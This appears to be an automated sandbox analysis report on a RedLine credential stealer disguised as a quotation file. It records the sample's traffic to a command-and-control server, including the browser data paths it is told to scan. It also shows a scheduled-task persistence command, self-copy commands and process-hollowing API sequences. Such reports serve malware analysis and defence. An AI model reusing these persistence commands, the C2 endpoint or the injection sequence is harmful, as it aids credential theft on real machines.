5c 4c 6f 63 61 6c 5c 37 53 74 61 72 5c 37 53 74 61 72 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 43 65 6e
                                                        Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Chromium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google(x86)\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Roaming\Opera Software\</b:string><b:string>%USERPROFILE%\AppData\Local\MapleStudio\ChromePlus\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Iridium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\7Star\7Star\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Cen


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        3192.168.2.549915185.222.58.9017910C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jun 16, 2022 14:44:33.402445078 CEST14283OUTPOST / HTTP/1.1
                                                        Content-Type: text/xml; charset=utf-8
                                                        SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                                                        Host: 185.222.58.90:17910
                                                        Content-Length: 1105829
                                                        Expect: 100-continue
                                                        Accept-Encoding: gzip, deflate
                                                        Jun 16, 2022 14:44:33.425847054 CEST14283INHTTP/1.1 100 Continue
                                                        Jun 16, 2022 14:44:33.722379923 CEST15405INHTTP/1.1 200 OK
                                                        Content-Length: 147
                                                        Content-Type: text/xml; charset=utf-8
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Thu, 16 Jun 2022 12:44:33 GMT
                                                        Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                        Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        4192.168.2.549917185.222.58.9017910C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jun 16, 2022 14:44:33.749598026 CEST15406OUTPOST / HTTP/1.1
                                                        Content-Type: text/xml; charset=utf-8
                                                        SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                        Host: 185.222.58.90:17910
                                                        Content-Length: 1105821
                                                        Expect: 100-continue
                                                        Accept-Encoding: gzip, deflate
                                                        Connection: Keep-Alive
                                                        Jun 16, 2022 14:44:33.773118973 CEST15406INHTTP/1.1 100 Continue
                                                        Jun 16, 2022 14:44:34.003176928 CEST16503INHTTP/1.1 200 OK
                                                        Content-Length: 261
                                                        Content-Type: text/xml; charset=utf-8
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Thu, 16 Jun 2022 12:44:33 GMT
                                                        Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                        Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        5192.168.2.549918185.222.58.9017910C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jun 16, 2022 14:44:38.557275057 CEST16504OUTPOST / HTTP/1.1
                                                        Content-Type: text/xml; charset=utf-8
                                                        SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                                        Host: 185.222.58.90:17910
                                                        Content-Length: 137
                                                        Expect: 100-continue
                                                        Accept-Encoding: gzip, deflate
                                                        Connection: Keep-Alive
                                                        Jun 16, 2022 14:44:38.580869913 CEST16504INHTTP/1.1 100 Continue
                                                        Jun 16, 2022 14:44:38.605325937 CEST16505INHTTP/1.1 200 OK
                                                        Content-Length: 212
                                                        Content-Type: text/xml; charset=utf-8
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Thu, 16 Jun 2022 12:44:38 GMT
                                                        Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                        Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                                                        Jun 16, 2022 14:44:43.686079979 CEST16505OUTPOST / HTTP/1.1
                                                        Content-Type: text/xml; charset=utf-8
                                                        SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                                                        Host: 185.222.58.90:17910
                                                        Content-Length: 144
                                                        Expect: 100-continue
                                                        Accept-Encoding: gzip, deflate
                                                        Jun 16, 2022 14:44:43.709475040 CEST16505INHTTP/1.1 100 Continue


                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Target ID:0
                                                        Start time:14:42:25
                                                        Start date:16/06/2022
                                                        Path:C:\Users\user\Desktop\QUOTATION 061622.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\QUOTATION 061622.exe"
                                                        Imagebase:0xb70000
                                                        File size:373760 bytes
                                                        MD5 hash:C2C0094C2E70379101D9704808838355
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.482019923.000000000383A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.482019923.000000000383A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low

                                                        General

                                                        Target ID:5
                                                        Start time:14:42:49
                                                        Start date:16/06/2022
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        Imagebase:0x11e0000
                                                        File size:2688096 bytes
                                                        MD5 hash:B3A917344F5610BEEC562556F11300FA
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000000.471969251.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000000.471969251.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000002.572983809.00000000076CF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000000.472524358.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000000.472524358.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000000.471695644.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000000.471695644.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000000.472226173.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000000.472226173.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000002.570961285.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.570961285.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:moderate

                                                        General

                                                        Target ID:7
                                                        Start time:14:42:51
                                                        Start date:16/06/2022
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff77f440000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Target ID:8
                                                        Start time:14:42:51
                                                        Start date:16/06/2022
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /f
                                                        Imagebase:0x1100000
                                                        File size:232960 bytes
                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Target ID:9
                                                        Start time:14:42:52
                                                        Start date:16/06/2022
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff77f440000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Target ID:10
                                                        Start time:14:42:52
                                                        Start date:16/06/2022
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:cmd" /c copy "C:\Users\user\Desktop\QUOTATION 061622.exe" "C:\Users\user\AppData\Roaming\Data\Data.exe
                                                        Imagebase:0x1100000
                                                        File size:232960 bytes
                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Target ID:11
                                                        Start time:14:42:53
                                                        Start date:16/06/2022
                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /f
                                                        Imagebase:0x960000
                                                        File size:185856 bytes
                                                        MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Target ID:12
                                                        Start time:14:42:54
                                                        Start date:16/06/2022
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff77f440000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Target ID:14
                                                        Start time:14:43:01
                                                        Start date:16/06/2022
                                                        Path:C:\Users\user\AppData\Roaming\Data\Data.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\AppData\Roaming\Data\Data.exe
                                                        Imagebase:0xf80000
                                                        File size:373760 bytes
                                                        MD5 hash:C2C0094C2E70379101D9704808838355
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000002.582345521.000000000368A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.582345521.000000000368A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Antivirus matches:
                                                        • Detection: 49%, ReversingLabs
                                                        Reputation:low

                                                        General

                                                        Target ID:21
                                                        Start time:14:43:32
                                                        Start date:16/06/2022
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        Imagebase:0x11e0000
                                                        File size:2688096 bytes
                                                        MD5 hash:B3A917344F5610BEEC562556F11300FA
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000015.00000002.692582557.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000002.692582557.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000015.00000000.565956315.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000000.565956315.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000015.00000000.565186728.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000000.565186728.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000015.00000000.565637349.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000000.565637349.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000015.00000002.696919861.0000000006E6F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000015.00000000.566287546.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000000.566287546.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:moderate

                                                        General

                                                        Target ID:22
                                                        Start time:14:43:35
                                                        Start date:16/06/2022
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff77f440000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Target ID:23
                                                        Start time:14:43:35
                                                        Start date:16/06/2022
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /f
                                                        Imagebase:0x1100000
                                                        File size:232960 bytes
                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Target ID:24
                                                        Start time:14:43:36
                                                        Start date:16/06/2022
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:cmd" /c copy "C:\Users\user\AppData\Roaming\Data\Data.exe" "C:\Users\user\AppData\Roaming\Data\Data.exe
                                                        Imagebase:0x1100000
                                                        File size:232960 bytes
                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Target ID:25
                                                        Start time:14:43:37
                                                        Start date:16/06/2022
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff77f440000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Target ID:26
                                                        Start time:14:43:37
                                                        Start date:16/06/2022
                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /f
                                                        Imagebase:0x960000
                                                        File size:185856 bytes
                                                        MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Target ID:27
                                                        Start time:14:43:38
                                                        Start date:16/06/2022
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff77f440000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Target ID:31
                                                        Start time:14:44:01
                                                        Start date:16/06/2022
                                                        Path:C:\Users\user\AppData\Roaming\Data\Data.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\AppData\Roaming\Data\Data.exe
                                                        Imagebase:0xf80000
                                                        File size:373760 bytes
                                                        MD5 hash:C2C0094C2E70379101D9704808838355
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001F.00000002.695577674.000000000393A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001F.00000002.695577674.000000000393A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                        Disassembly

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:35.2%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:91.4%
                                                          Total number of Nodes:35
                                                          Total number of Limit Nodes:0
                                                          execution_graph 9640 4e3ad28 9641 4e3ad61 9640->9641 9671 4e2b100 9641->9671 9675 4e2b0f5 9641->9675 9642 4e3f305 9659 4e2b4d0 SetThreadContext 9642->9659 9660 4e2b4c9 SetThreadContext 9642->9660 9643 4e3f348 9665 4e2b4d0 SetThreadContext 9643->9665 9666 4e2b4c9 SetThreadContext 9643->9666 9644 4e3f22e 9645 4e3b361 9645->9642 9653 4e2b590 ReadProcessMemory 9645->9653 9654 4e2b589 ReadProcessMemory 9645->9654 9646 4e3c551 9655 4e2b650 VirtualAllocEx 9646->9655 9656 4e2b649 VirtualAllocEx 9646->9656 9647 4e3cf2c 9647->9642 9661 4e2b6f0 WriteProcessMemory 9647->9661 9662 4e2b6f8 WriteProcessMemory 9647->9662 9648 4e3d617 9649 4e3e575 9648->9649 9657 4e2b6f0 WriteProcessMemory 9648->9657 9658 4e2b6f8 WriteProcessMemory 9648->9658 9663 4e2b6f0 WriteProcessMemory 9649->9663 9664 4e2b6f8 WriteProcessMemory 9649->9664 9650 4e3e9a4 9650->9642 9651 4e3edae 9650->9651 9651->9643 9652 4e3f209 9651->9652 9667 4e2b7d0 ResumeThread 9652->9667 9668 4e2b7c8 ResumeThread 9652->9668 9653->9646 9654->9646 9655->9647 9656->9647 9657->9648 9658->9648 9659->9643 9660->9643 9661->9648 9662->9648 9663->9650 9664->9650 9665->9644 9666->9644 9667->9644 9668->9644 9673 4e2b18d CreateProcessAsUserA 9671->9673 9674 4e2b3a5 9673->9674 9674->9674 9676 4e2b18d CreateProcessAsUserA 9675->9676 9678 4e2b3a5 9676->9678 9678->9678

                                                          Executed Functions

                                                          Function 02812C9F Relevance: 5.8, Strings: 1, Instructions: 4570COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 2812c9f-2812cda 1 2812c71-2812c98 0->1 2 2812cdc-2812e0d 0->2 1->0 7 2812e69-2812f1e 2->7 8 2812e0f-2812e2c 2->8 12 2812f24-2812f68 7->12 9 2812e2d-2812e63 8->9 9->9 10 2812e65-2812e68 9->10 10->7 16 2812f70-2812f73 12->16 17 2812f7e-2813004 16->17 23 2817933-281794d 17->23 24 281300a-28130e7 17->24 24->23 34 28130ed-28131e9 24->34 34->23 43 28131ef-28136fc 34->43 43->23 82 2813702-28137c7 43->82 82->23 89 28137cd-2813c81 82->89 89->23 125 2813c87-2813d67 89->125 125->23 133 2813d6d-2814267 125->133 133->23 175 281426d-2814333 133->175 175->23 181 2814339-2814788 call 28101ec 175->181 181->23 220 281478e-28147a9 181->220 222 28147af-28147ba 220->222 223 28147c1-28147e7 222->223 226 2814837-2814a76 223->226 227 28147e9-28147f5 223->227 250 2814ea5-2815288 226->250 251 2814a7c-2814a85 226->251 228 28147f7-28147fd 227->228 229 28147ff-2814805 227->229 230 281480f-2814834 228->230 229->230 250->23 330 281528e-28156b6 250->330 251->23 252 2814a8b-2814aa2 251->252 255 2814e14-2814e9f 252->255 256 2814aa8-2814b72 252->256 255->250 255->251 278 2814c39-2814c87 256->278 279 2814b78-2814b7e 256->279 291 2814c89-2814cb7 278->291 292 2814ce8-2814d0f 278->292 279->23 280 2814b84-2814c33 279->280 280->278 280->279 291->292 298 2814cb9-2814ce6 291->298 293 2814d15-2814e0f 292->293 293->250 298->293 368 28157b6-2815873 330->368 369 28156bc-28157b1 330->369 384 2815879-281593d 368->384 369->384 392 2815943-2815b2b 384->392 393 2816a77-2816cf8 384->393 392->23 430 2815b31-2815bf3 392->430 393->23 436 2816cfe-2816d2b 393->436 430->23 448 2815bf9-2815cc5 430->448 436->23 438 2816d31-2816e76 436->438 438->23 462 2816e7c-281716f 438->462 465 2815ce3-2815cf1 448->465 466 2815cc7-2815ccd 448->466 462->23 539 2817175-28173f3 462->539 471 2815cf3-2815d01 465->471 466->23 467 2815cd3-2815ce1 466->467 467->471 475 2816793-2816911 471->475 476 2815d07-2815d10 471->476 517 2816913-2816a71 475->517 476->475 480 2815d16-2815d1f 476->480 480->475 486 2815d25-2815fc3 480->486 486->23 555 2815fc9-2816098 486->555 517->392 517->393 539->23 588 28173f9-2817683 539->588 555->23 568 281609e-28162e0 555->568 568->23 604 28162e6-2816536 568->604 588->23 631 2817689-2817804 588->631 604->23 640 281653c-2816784 604->640 631->23 656 281780a-2817908 631->656 640->23 676 281678a-281678e 640->676 672 2817910-2817913 656->672 674 281791b-2817930 672->674 676->517
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481785655.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2810000_QUOTATION 061622.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: B
                                                          • API String ID: 0-1255198513
                                                          • Opcode ID: 1d48f845adf5be23e66d2e39484fd74425aad840d8148537a8e0bef30348c3d1
                                                          • Instruction ID: f129c9b025b9630577c59a7916bd47ed25dd4c7ff76432543a74bb1a09be1881
                                                          • Opcode Fuzzy Hash: 1d48f845adf5be23e66d2e39484fd74425aad840d8148537a8e0bef30348c3d1
                                                          • Instruction Fuzzy Hash: C2A36C74E452688FC715EF28DC8569DBBF2FB89200F0189E9D488A3395DB346E95CF42
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04E20040 Relevance: 4.4, Instructions: 4372COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
